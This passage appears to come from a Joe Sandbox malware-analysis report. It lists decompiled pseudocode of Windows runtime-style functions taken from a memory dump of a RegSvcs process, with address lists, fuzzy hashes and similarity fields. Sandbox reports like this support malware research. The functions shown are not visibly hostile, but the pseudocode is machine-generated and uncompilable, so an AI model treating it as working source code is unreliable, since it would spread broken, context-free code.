									__eflags = _t82 -  *0xb386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0xb386bc;
										_t72 = 0xb386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00A49240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0xb386c4;
									_t72 = 0xb386c0;
									L18:
									E00A79B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x00a49100
0x00a49100
0x00a49100
0x00a49100
0x00a49102
0x00a49107
0x00a4910c
0x00a49110
0x00a49115
0x00a49136
0x00a49143
0x00aa37e4
0x00aa37e4
0x00a49149
0x00a4914e
0x00a4914e
0x00a49117
0x00a4911d
0x00000000
0x00000000
0x00a4911f
0x00a49125
0x00000000
0x00a49151
0x00a49158
0x00a4915d
0x00a49161
0x00a49168
0x00aa3715
0x00000000
0x00a4916e
0x00a4916e
0x00a49175
0x00a49177
0x00a4917e
0x00a4917f
0x00a49182
0x00a49182
0x00a49187
0x00a49187
0x00a4918a
0x00a4918d
0x00a4918f
0x00a49192
0x00a49195
0x00a49198
0x00a49198
0x00a49198
0x00a4919a
0x00000000
0x00000000
0x00aa371f
0x00aa3721
0x00aa3727
0x00aa372f
0x00aa3733
0x00aa3735
0x00aa3738
0x00aa373b
0x00aa373d
0x00aa3740
0x00000000
0x00000000
0x00aa3746
0x00aa3749
0x00000000
0x00000000
0x00aa374f
0x00aa3751
0x00000000
0x00000000
0x00aa3757
0x00aa3759
0x00aa375c
0x00aa375c
0x00aa375e
0x00aa375e
0x00aa3761
0x00aa3764
0x00000000
0x00000000
0x00aa3766
0x00aa3768
0x00aa37a3
0x00aa37a3
0x00aa37a5
0x00aa37a7
0x00aa37ad
0x00aa37b0
0x00aa37b2
0x00aa37bc
0x00aa37c2
0x00aa37c2
0x00aa37b2
0x00a49187
0x00a49187
0x00a4918a
0x00a4918d
0x00a4918f
0x00a49192
0x00a49195
0x00000000
0x00a49195
0x00000000
0x00a49187
0x00aa376a
0x00aa376a
0x00aa376c
0x00aa376c
0x00aa376f
0x00aa3775
0x00000000
0x00000000
0x00aa3777
0x00aa3779
0x00000000
0x00000000
0x00aa3782
0x00aa3787
0x00aa3789
0x00aa3790
0x00aa3790
0x00aa378b
0x00aa378b
0x00aa378b
0x00aa3792
0x00aa3795
0x00aa3795
0x00aa3798
0x00aa3798
0x00aa379b
0x00aa379b
0x00a491a3
0x00a491a9
0x00a491b0
0x00a491b4
0x00a491b4
0x00a491bb
0x00a491c0
0x00a491c5
0x00a491c7
0x00aa37da
0x00a491cd
0x00a491cd
0x00a491cd
0x00a491d2
0x00a491d5
0x00a49239
0x00a49239
0x00a491d7
0x00a491db
0x00a491e1
0x00a491e7
0x00a491fd
0x00a49203
0x00a4921e
0x00a49223
0x00000000
0x00a49223
0x00a49205
0x00a49208
0x00a4920c
0x00a49214
0x00a49214
0x00a491e9
0x00a491e9
0x00a491ee
0x00a491f3
0x00a491f3
0x00a491f3
0x00a491e7
0x00000000
0x00a491db
0x00a49187
0x00a49168

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec18bd6e281ead2d79e6051467d611c7999afdf92ae3baf38a2ccb5820a176e3
Instruction ID: 7c02e8cab85e75439454e3046157cedfcd37ecb67071b706f12415bb92468c20
Opcode Fuzzy Hash: ec18bd6e281ead2d79e6051467d611c7999afdf92ae3baf38a2ccb5820a176e3
Instruction Fuzzy Hash: 5631F479A00246DFDB61DB6CC589BAFB7F1BBC9310F248259E40467251CB30AD90CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A71DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00A71DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E00A6F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L00A64620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E00A6F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x00a71dc2
0x00a71dc5
0x00a71dc7
0x00a71dcc
0x00a71dce
0x00a71dd6
0x00a71ddf
0x00a71de0
0x00a71de1
0x00a71de5
0x00a71de8
0x00a71def
0x00a71df0
0x00a71df6
0x00a71df7
0x00a71dfe
0x00a71e1a
0x00000000
0x00000000
0x00a71e0b
0x00a71e12
0x00a71e12
0x00a71e00
0x00a71e00
0x00a71e05
0x00a71e1e
0x00a71e23
0x00ab570f
0x00ab5713
0x00000000
0x00000000
0x00ab5719
0x00ab5719
0x00a71e2c
0x00a71e2d
0x00a71e2e
0x00a71e2f
0x00a71e31
0x00a71e32
0x00a71e35
0x00a71e3d
0x00ab5723
0x00ab573d
0x00ab573d
0x00000000
0x00ab5723
0x00a71e49
0x00a71e4e
0x00a71e4e
0x00a71e09
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 3d267a9be7540fc487e6db3e983f8e0af97a8c013b8f710cc2b26435e609ab4a
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 8F216D72A00519AFD721CF9DCD80EABBBBDEF85740F258065E90997211D634AE01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A60050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00A60050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0xb3d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E00A79ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E00A8B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E00B18A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E00A79702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0xb3b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x00a60055
0x00a6005d
0x00a60062
0x00a6006c
0x00a6006f
0x00a60074
0x00a6007a
0x00a6007a
0x00a60080
0x00a60080
0x00a60087
0x00a6008d
0x00a6008f
0x00a60093
0x00a60095
0x00a6009b
0x00a600f8
0x00a600fb
0x00a600fc
0x00a600ff
0x00a60108
0x00a60108
0x00a600a2
0x00a600a6
0x00a600b3
0x00a600bc
0x00a600c5
0x00a600ca
0x00aac01e
0x00000000
0x00000000
0x00aac02d
0x00a600d5
0x00a600d9
0x00aac03d
0x00aac046
0x00aac046
0x00a600df
0x00a600e2
0x00a600ea
0x00a600ef
0x00a600f2
0x00a600f6
0x00a60111
0x00a60117
0x00a60117
0x00000000
0x00a600f6
0x00a600d0
0x00a600d0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 793db5d54b1645b7518bf5621bd473f1962498b0b4284a81d5ea854dd5d15d0b
Instruction ID: cd11a8b94a091569ec6656328ec52afd7abd2d01fbd8ba58c368afec04abb796
Opcode Fuzzy Hash: 793db5d54b1645b7518bf5621bd473f1962498b0b4284a81d5ea854dd5d15d0b
Instruction Fuzzy Hash: D3317831211B04CFD725CB28C940B9BB3F5FF89714F258569E49A87AA0EB75AC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00AC6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E00A67D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0xb37b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L00A64620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E00A8F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E00A67D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E00A89AE0();
						_t23 = L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x00ac6c0a
0x00ac6c0f
0x00ac6c10
0x00ac6c13
0x00ac6c15
0x00ac6c19
0x00ac6c1c
0x00ac6c21
0x00ac6c28
0x00ac6c3a
0x00ac6c2a
0x00ac6c33
0x00ac6c33
0x00ac6c3f
0x00ac6c48
0x00ac6c4d
0x00ac6c60
0x00ac6c65
0x00ac6c69
0x00ac6c73
0x00ac6c79
0x00ac6c7f
0x00ac6c86
0x00ac6c90
0x00ac6c94
0x00ac6ca6
0x00ac6cb2
0x00ac6cbd
0x00ac6cbd
0x00ac6cc3
0x00ac6cc7
0x00ac6ccb
0x00ac6cd0
0x00ac6cd1
0x00ac6ce2
0x00ac6ce2
0x00ac6c69
0x00ac6ced

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b52a921c632132cf2d1c0c16ec63f89bfe90b82e56cdd2a9dbf2de9ebedfe4d3
Instruction ID: dcfc10b15f382788c9482fd6f11197da2a6a1343e00e15d0af1b4fcaaad4fb56
Opcode Fuzzy Hash: b52a921c632132cf2d1c0c16ec63f89bfe90b82e56cdd2a9dbf2de9ebedfe4d3
Instruction Fuzzy Hash: A021DCB1A14644AFC715DF68D980F6AB7B8FF48744F140069F908CBB91EA34ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A890AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00A890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E00A9D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E00A7E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L00A64620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E00A8F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E00A7A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x00a890af
0x00a890b8
0x00a890bb
0x00a890bf
0x00a890c2
0x00a890c2
0x00a890c8
0x00a890cb
0x00a890cd
0x00ac14d7
0x00ac14eb
0x00ac14eb
0x00000000
0x00ac14eb
0x00ac14db
0x00ac14e6
0x00000000
0x00ac14f2
0x00ac14e8
0x00000000
0x00ac14e8
0x00a890d8
0x00a890da
0x00a890dd
0x00a890e5
0x00000000
0x00a89139
0x00a890fa
0x00a890fe
0x00a89142
0x00000000
0x00a89142
0x00a89104
0x00a89107
0x00a8910b
0x00a89110
0x00a89118
0x00a89147
0x00a89148
0x00a8914f
0x00a89150
0x00a89151
0x00a89152
0x00a89156
0x00a8915d
0x00a89160
0x00a89168
0x00a8916c
0x00a891bc
0x00a891be
0x00000000
0x00a891be
0x00a8916e
0x00a89173
0x00a89176
0x00000000
0x00000000
0x00a8917c
0x00a89180
0x00a891b5
0x00000000
0x00a891b5
0x00a89182
0x00a89185
0x00a89189
0x00000000
0x00000000
0x00a8918e
0x00a89190
0x00a89198
0x00000000
0x00000000
0x00a891a0
0x00000000
0x00a891ad
0x00a891ad
0x00a891b0
0x00a891b1
0x00000000
0x00a89185
0x00a8911a
0x00a8911c
0x00a8911f
0x00a89125
0x00a89127
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 2c22d638a598c08b2cd0f9a5ab21954be4c3fd6bc8be8d00c221d8e907cdea78
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 84219271A00205EFDB20EF59C944E6AF7F8EF54710F15896AF949AB201D330ED40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A73B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00A73B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0xb384c4; // 0x0
				_v12 = 1;
				_v8 =  *0xb384c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0xb384c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E00A8AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E00A8FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0xb384c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0xb384c4; // 0x0
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x00a73b89
0x00a73b96
0x00a73ba1
0x00a73bab
0x00a73bb5
0x00a73bb9
0x00ab6298
0x00a73bbf
0x00a73bc2
0x00a73bc3
0x00a73bc9
0x00a73bca
0x00a73bcc
0x00a73bcd
0x00a73bd4
0x00a73bd6
0x00a73bdb
0x00a73bea
0x00a73bf7
0x00a73bfb
0x00a73bff
0x00a73c09
0x00a73c0a
0x00a73c0b
0x00a73c0f
0x00a73c14
0x00a73c18
0x00a73c18
0x00a73bfb
0x00a73c1b
0x00a73c30
0x00a73c30
0x00a73c3d

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15fa74b513c02e3481f26595884bb3b50385d0221df25b1c2e1594d3f6d1f910
Instruction ID: 8be9b400969b43792893c1a75394eff8dd90d0d9a96cd387a76f853293953c53
Opcode Fuzzy Hash: 15fa74b513c02e3481f26595884bb3b50385d0221df25b1c2e1594d3f6d1f910
Instruction Fuzzy Hash: 5421B0B2A00105AFCB05DF58CE81B5EB7BDFB44748F254068F509AB252C771EE05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00AC6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E00A67D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E00A67D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0xa25c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E00A7F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E00A7F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E00AC7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L00A62400( &_v52);
								}
								_t21 = L00A62400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x00ac6cfb
0x00ac6d00
0x00ac6d02
0x00ac6d06
0x00ac6d0a
0x00ac6d0e
0x00ac6d19
0x00ac6d2b
0x00ac6d1b
0x00ac6d24
0x00ac6d24
0x00ac6d33
0x00ac6d39
0x00ac6d46
0x00ac6d4f
0x00ac6d61
0x00ac6d51
0x00ac6d5a
0x00ac6d5a
0x00ac6d69
0x00ac6d6b
0x00ac6d6d
0x00ac6d6f
0x00ac6d6f
0x00ac6d74
0x00ac6d79
0x00ac6d7a
0x00ac6d7f
0x00ac6d82
0x00ac6d88
0x00ac6d89
0x00ac6d90
0x00ac6d94
0x00ac6da7
0x00ac6db1
0x00ac6db1
0x00ac6dbb
0x00ac6dbb
0x00ac6d90
0x00ac6d69
0x00ac6d46
0x00ac6dc6

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8ca0d1f3a7c846f9a68c69d5eff73b6fd07207456a3a433ed5213bb84a3901e
Instruction ID: 2cb10e13c46859bd590a25080e5b05aed703dfe42710a808b32636e20f8cea5c
Opcode Fuzzy Hash: a8ca0d1f3a7c846f9a68c69d5eff73b6fd07207456a3a433ed5213bb84a3901e
Instruction Fuzzy Hash: 2521C572604B459FD712EF29CA44FABB7ECAF81744F05096AF941C7251EB34D908C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B1070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00B1070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E00B107DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E00B0AFDE( &_v8,  &_v12);
					E00B11293(_t38, _v28, _t60);
					if(E00A67D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E00B014FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x00b1071b
0x00b10724
0x00b10734
0x00b10738
0x00b1074b
0x00b1074b
0x00b10753
0x00b10753
0x00b10759
0x00b1075d
0x00b10774
0x00b10779
0x00b1077d
0x00b10789
0x00b10795
0x00b107a7
0x00b10797
0x00b107a0
0x00b107a0
0x00b107af
0x00b107c4
0x00b107cd
0x00b107cd
0x00b107af
0x00b107dc

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: ee3d156ef4093c90cb6caf2f6097b6a8be89c407b8eae00389a438be8dcbafda
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: A42104362142049FD705EF18C880BAABBE5EFC4350F0485A9F9958B386D770ED89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A6AE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A6AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E00A67D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E00A67D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E00A67D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E00A67D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E00AC7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x00a6ae78
0x00a6ae7c
0x00a6ae7e
0x00a6ae81
0x00a6ae86
0x00a6ae8d
0x00ab2691
0x00a6ae93
0x00a6ae93
0x00a6ae93
0x00a6ae98
0x00a6ae9d
0x00ab26a2
0x00ab26b4
0x00ab26a4
0x00ab26ad
0x00ab26ad
0x00ab26b9
0x00000000
